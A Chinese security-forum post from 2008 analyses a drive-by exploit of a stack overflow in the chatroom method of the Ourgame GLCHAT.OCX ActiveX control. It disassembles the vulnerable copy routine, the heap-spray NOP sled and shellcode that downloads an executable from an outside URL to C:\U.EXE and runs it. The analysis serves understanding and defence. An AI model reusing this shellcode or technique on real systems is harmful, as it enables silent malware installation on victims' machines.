前几日浏览一网站时,感觉有些不对,经检查发现系统中被下载执行好几个程序。
通过对那个网站分析,发现是利用 联众游戏中activcex 程序名为glchat.ocx中的chatroom漏洞,最新的 1月19日的更新那个漏洞,还在。
当时浏览网址地址是: hxxp://www.80diy.com/home/20050812/08/4204306.html
喜欢玩漏洞,可以从这个网址追踪一下。就可以找到那段网页代码。
执行到 029A1DC0的ESP指向的堆栈数据
0012C9AC 73D47F2C 0020E0DC 73D47AC6 73D47A6C ,.s.. ..z.slz.s
下面是chatroom的代码
029A1DC0 SUB ESP,00000100----->最长为256字节,多了就溢出了。
029A1DC6 PUSH EBX
029A1DC7 PUSH EBP
029A1DC8 MOV EBP,ECX
029A1DCA PUSH ESI
029A1DCB MOV ESI,[ESP+00000110]
029A1DD2 MOV EAX,[EBP+00001080]
029A1DD8 LEA EBX,[EBP+00001080]
029A1DDE MOV DL,[EAX]
029A1DE0 MOV CL,DL
029A1DE2 CMP DL,[ESI]
029A1DE4 JNZ 029A1E02
029A1DE6 TEST CL,CL
029A1DE8 JZ 029A1DFE
029A1DEA MOV DL,[EAX+01]
029A1DED MOV CL,DL
029A1DEF CMP DL,[ESI+01]
029A1DF2 JNZ 029A1E02
029A1DF4 ADD EAX,02
029A1DF7 ADD ESI,02
029A1DFA TEST CL,CL
029A1DFC JNZ 029A1DDE
029A1DFE XOR EAX,EAX
029A1E00 JMP 029A1E07
029A1E02 SBB EAX,EAX
029A1E04 SBB EAX,-01
029A1E07 TEST EAX,EAX
029A1E09 JZ 029A1E7E
029A1E0B PUSH EDI
029A1E0C MOV EDI,[ESP+00000114]
029A1E13 OR ECX,-01
029A1E16 XOR EAX,EAX ------->计算长度。
029A1E18 REPNZ SCASB
029A1E1A NOT ECX
029A1E1C SUB EDI,ECX
029A1E1E LEA EDX,[ESP+10]
029A1E22 MOV EAX,ECX
029A1E24 MOV ESI,EDI
029A1E26 MOV EDI,EDX
029A1E28 SHR ECX,02
029A1E2B REPZ MOVSD --------->产生溢出的位置
029A1E2D MOV ECX,EAX
029A1E2F AND ECX,03
029A1E32 REPZ MOVSB
029A1E34 MOV AL,[ESP+10]
029A1E38 POP EDI
029A1E39 CMP AL,67
029A1E3B JZ 029A1E41
029A1E3D CMP AL,47
029A1E3F JNZ 029A1E66
029A1E41 MOV AL,[ESP+0D]
029A1E45 TEST AL,AL
029A1E47 JZ 029A1E52
029A1E49 CMP AL,20
029A1E4B JNZ 029A1E49
029A1E4D MOV BYTE PTR [ESP+0D],00
029A1E52 LEA ECX,[ESP+0D]
029A1E56 PUSH ECX
029A1E57 CALL [029DFCBC]
029A1E5D ADD ESP,04
029A1E60 MOV [EBP+000011E4],EAX
029A1E66 MOV EDX,[ESP+00000110]
029A1E6D MOV ECX,EBX
029A1E6F PUSH EDX
029A1E70 CALL 029C8834
029A1E75 PUSH 01
029A1E77 MOV ECX,EBP
029A1E79 CALL 029C8822
029A1E7E POP ESI
029A1E7F POP EBP
029A1E80 POP EBX
029A1E81 ADD ESP,00000100
029A1E87 RET 0004
执行到 029A1E87时ESP的数据变成了下面的溢出的内容,返回后EIP将执行 0A0A0A0A出的代码。
0012C9AC 0A0A0A0A 0A0A0A0A 0A0A0A0A 0A0A0A0A ................
下面是显示的0A0A0A0A的代码,使用内存的暴力扩展。真正shellcode代码见下面的反汇编
:db a0a0a0a l20
0A0A0A0A 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
0A0A0A1A 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
0A0AFEFA 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
0A0AFF0A 90 90 90 90 90 90 90 90-90 90 90 90 EB 54 8B 75 .............T.u
0A0AFF1A 3C 8B 74 35 78 03 F5 56-8B 76 20 03 F5 33 C9 49 <.t5x..V.v ..3.I
从下面开始就是shellcode的代码了。该段代码是下载程序保存为C:\U.EXE并执行它
0A0AFF16 JMP 0A0AFF6C (JUMP )
0A0AFF18 MOV ESI,[EBP+3C]
0A0AFF1B MOV ESI,[ESI+EBP+78]
0A0AFF1F ADD ESI,EBP
0A0AFF21 PUSH ESI
0A0AFF22 MOV ESI,[ESI+20]
0A0AFF25 ADD ESI,EBP
0A0AFF27 XOR ECX,ECX
0A0AFF29 DEC ECX
0A0AFF2A INC ECX
0A0AFF2B LODSD
0A0AFF2C XOR EBX,EBX
0A0AFF2E MOVSX EDX,BYTE PTR SS:[EBP+EAX]
0A0AFF33 CMP DL,DH
0A0AFF35 JZ 0A0AFF3F
0A0AFF37 ROR EBX,0D
0A0AFF3A ADD EBX,EDX
0A0AFF3C INC EAX
0A0AFF3D JMP 0A0AFF2E
0A0AFF3F CMP EBX,EDI
0A0AFF41 JNZ 0A0AFF2A
0A0AFF43 POP ESI
0A0AFF44 MOV EBX,[ESI+24]
0A0AFF47 ADD EBX,EBP
0A0AFF49 MOV CX,[ECX*2+EBX]
0A0AFF4D MOV EBX,[ESI+1C]
0A0AFF50 ADD EBX,EBP
0A0AFF52 MOV EAX,[ECX*4+EBX]
0A0AFF55 ADD EAX,EBP
0A0AFF57 RET
:d a0aff58 l100
0A0AFF58 75 72 6C 6D 6F 6E 2E 64-6C 6C 00 43 3A 5C 55 2E urlmon.dll.C:\U.---保存的文件名
0A0AFF68 65 78 65 00 33 C0 64 03-40 30 78 0C 8B 40 0C 8B exe.3.d.@0x..@..
0A0AFF6C XOR EAX,EAX
0A0AFF6E ADD EAX,FS:[EAX+30]
0A0AFF72 JS 0A0AFF80
0A0AFF74 MOV EAX,[EAX+0C]
0A0AFF77 MOV ESI,[EAX+1C]
0A0AFF7A LODSD
0A0AFF7B MOV EAX,[EAX+08]
0A0AFF7E JMP 0A0AFF89
0A0AFF80 MOV EAX,[EAX+34]
0A0AFF83 LEA EAX,[EAX+7C]
0A0AFF86 MOV EAX,[EAX+3C]
0A0AFF89 XCHG EAX,EBP
0A0AFF8A MOV EDI,EC0E4E8E
0A0AFF8F CALL 0A0AFF18------------>loadlibrarya
0A0AFF94 SUB ESP,04
0A0AFF97 SUB DWORD PTR [ESP],3C
0A0AFF9B CALL EAX
0A0AFF9D XCHG EAX,EBP
0A0AFF9E PUSH EAX
0A0AFF9F MOV EDI,702F1A36
0A0AFFA4 CALL 0A0AFF18
0A0AFFA9 MOV EDX,[ESP-04]
0A0AFFAD LEA EDX,[EDX-46]
0A0AFFB0 XOR EBX,EBX
0A0AFFB2 PUSH EBX
0A0AFFB3 PUSH EBX
0A0AFFB4 PUSH EDX
0A0AFFB5 JMP 0A0AFFDB
0A0AFFB7 PUSH EBX
0A0AFFB8 CALL EAX------------>URLDownloadToFileA
0A0AFFBA POP EBP
0A0AFFBB MOV EDI,0E8AFE98
0A0AFFC0 CALL 0A0AFF18------------>winexec
0A0AFFC5 SUB ESP,04
0A0AFFC8 SUB DWORD PTR [ESP],62
0A0AFFCC CALL EAX
0A0AFFCE MOV EDI,73E2D87E
0A0AFFD3 CALL 0A0AFF18---------->exitprocess
0A0AFFD8 PUSH EDX
0A0AFFD9 CALL EAX
0A0AFFDB CALL 0A0AFFB7
:d a0affe0 l100
0A0AFFE0 68 74 74 70 3A 2F 2F 77-77 77 2E 65 68 65 68 30 http://www.eheh0--->网址在这里
0A0AFFF0 30 31 2E 63 6E 2F 61 61-2E 65 78 65 00 00 00 00 01.cn/aa.exe....
0A0B0000 00 00 13 0A 00 00 03 0A-00 00 00 00 00 00 00 00 ................
0A0B0010 00 00 08 00 00 00 08 00-20 00 00 00 00 0B 00 00 ........ .......
0A0B0020 D8 FF 07 00 90 90 90 90-90 90 90 90 90 90 90 90 ................
0A0B0030 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
0A0B0040 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
0A0B0050 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
0A0B00C0 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
0A0B00D0 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
- 标 题:联众插件GLCHAT.OCX中chatroom漏洞分析
- 作 者:softdebug
- 时 间:2008-01-23 23:18
- 链 接:http://bbs.pediy.com/showthread.php?t=58815